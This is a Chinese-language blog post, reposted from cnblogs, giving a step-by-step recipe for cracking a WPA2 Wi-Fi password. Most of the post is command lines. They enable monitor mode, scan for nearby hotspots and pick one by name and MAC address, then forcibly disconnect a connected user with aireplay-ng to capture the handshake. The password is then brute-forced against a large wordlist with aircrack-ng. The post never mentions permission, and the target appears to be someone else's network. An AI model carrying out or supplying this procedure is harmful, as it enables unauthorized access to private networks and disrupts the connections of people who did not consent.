wifi密码破解
This_is_Y Lv6

来自之前cnblog的博客
源地址:https://www.cnblogs.com/This-is-Y/p/14057260.html

iwconfig查看网卡

 

 

 启动监听模式,设置信道

 ifconfig wlan0 down
 iwconfig wlan0 mode Monitor
 ifconfig wlan0 up
 iwconfig wlan0 channel 10

 

 

 airodump-ng wlan0扫描周边热点

找疾风剑豪这个

 

 

 

 得到MAC地址

2E:15:E1:28:56:08

 

准备抓握手包(需要有人连上了目标wifi,把他踢下线,在他重新连接的时候进行抓包操作)

airodump-ng -c 3 –bssid 2E:15:E1:28:56:08 -w /root/WPA2/yasuo wlan0
airodump-ng -c 3(信道) –bssid 2E:15:E1:28:56:08(目标wifiMAC地址) -w /root/WPA2/527(握手包保存地址) wlan0(工作的网卡)

注意,-c参数不能丢,不然后续踢人下线的时候,会出现这个问题

 

 

 

等待一段时间,下面表示有5个人练了这个wifi

 

 

 

 找一个幸运儿,踢他下线

aireplay-ng -0 5 -a 2E:15:E1:28:56:08 -c 28:3A:4D:0B:6C:91  wlan0
aireplay-ng -0 5(发送断开连接包的数量) -a 2E:15:E1:28:56:08(wifi的MAC地址) -c 28:3A:4D:0B:6C:91(幸运儿的设备MAC地址)  wlan0(工作网卡)

 

 

 

 一般来说断开一两次就可以抓到包,偶尔脸黑抓不到,就换一个人踢,

抓到包后,在airdump-ng这里可以看到

 

 

然后就是爆破了

aircrack-ng -w /root/wifi_password_dir/xato-net-10-million-passwords.txt yasuo-02.cap
aircrack-ng -w 字典位置 握手包位置

 

 

 

 

总结一下就是,

启动:

 ifconfig wlan0 down
 iwconfig wlan0 mode Monitor
 ifconfig wlan0 up
 iwconfig wlan0 channel 10

扫描:

  airodump-ng wlan0

抓包:
  airodump-ng -c 3(信道) –bssid 2E:15:E1:28:56:08(目标wifiMAC地址) -w /root/WPA2/527(握手包保存地址) wlan0(工作的网卡)

  踢人:  

    aireplay-ng -0 5(发送断开连接包的数量) -a 2E:15:E1:28:56:08(wifi的MAC地址) -c 28:3A:4D:0B:6C:91(幸运儿的设备MAC地址)  wlan0(工作网卡)

爆破:
  aircrack-ng -w 字典位置 握手包位置

 Comments